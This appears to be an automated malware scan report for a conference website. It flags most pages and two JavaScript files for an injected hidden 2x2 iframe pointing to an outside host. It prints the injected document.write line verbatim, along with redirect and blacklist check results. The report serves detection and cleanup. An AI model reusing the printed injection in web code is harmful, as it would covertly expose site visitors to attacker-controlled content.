Scanned pages/files
Request | Server response | Status |
http://synapticdiseases.ch/ | 200 OK Content-Length: 3950 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/meeting.html | 200 OK Content-Length: 3783 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/index.html | 200 OK Content-Length: 3950 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/program.html | 200 OK Content-Length: 2946 Content-Type: text/html | clean |
http://synapticdiseases.ch/js/prototype.js | 200 OK Content-Length: 163312 Content-Type: application/x-javascript | clean |
http://synapticdiseases.ch/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 3087 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801></iframe>');
var Scriptaculous = { Version: '1.9.0', require: function(libraryName) { try{ document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); } catch(e) { var script = document.createElement('script'); script.type = 'text/j [... excerpt truncated in the report ...] var js = /scriptaculous\.js(\?.*)?$/; $$('script[src]').findAll(function(s) { return s.src.match(js); }).each(function(s) { var path = s.src.replace(js, ''), includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } }; Scriptaculous.load();
(The leading document.write(...) statement is the injected code; it writes the same 2x2 iframe reported below. The rest of the excerpt appears to be the original script.aculo.us loader.)
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801> | ||
http://synapticdiseases.ch/js/lightbox.js | 200 OK Content-Length: 18668 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801></iframe>');
LightboxOptions = Object.extend({ fileLoadingImage: 'images/loading.gif', fileBottomNavCloseImage: 'images/closelabel.gif', overlayOpacity: 0.8, animate: true, resizeSpeed: 7, borderSize: 10, labelImage: "Image", labelOf: "of" [... excerpt truncated in the report ...] windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); });
(The leading document.write(...) statement is the injected code; it writes the same 2x2 iframe reported below. The rest of the excerpt appears to be the original Lightbox script.)
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801> | ||
http://synapticdiseases.ch/registration.html | 200 OK Content-Length: 2667 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/call_for_abstract.html | 200 OK Content-Length: 3382 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/js/prepopulate.js | 200 OK Content-Length: 2733 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801> | ||
http://synapticdiseases.ch/travel_and_accomodations.html | 200 OK Content-Length: 4692 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/contact.html | 200 OK Content-Length: 3067 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/test404page.js | 404 Not Found Content-Length: 1042 Content-Type: text/html | clean |
http://synapticdiseases.ch/img/programm_big.gif | 200 OK Content-Length: 278343 Content-Type: image/gif | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: synapticdiseases.ch
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Dec 2014 00:59:07 GMT
Accept-Ranges: bytes
ETag: "40198208-f6e-4de4ebbb72540"
Server: Apache
Content-Length: 3950
Content-Type: text/html
Last-Modified: Tue, 04 Jun 2013 07:07:25 GMT
...3950 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: synapticdiseases.ch
Referer: http://www.google.com/search?q=synapticdiseases.ch
Result:
The result is similar to the first query. There are no suspicious redirects found. This check covers only referrer-dependent redirects: the 3950-byte response it compares against has the same length as the index page flagged above for a hidden iframe, so a negative redirect result does not mean the page content is clean.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=synapticdiseases.ch
Result: This site is not currently listed as suspicious. This reflects only the blacklist's status at scan time; the hidden iframes reported above were found by scanning the page content directly.
Query: http://yandex.com/infected?l10n=en&url=http://synapticdiseases.ch/
Result: synapticdiseases.ch is not infected or malware details are not published yet.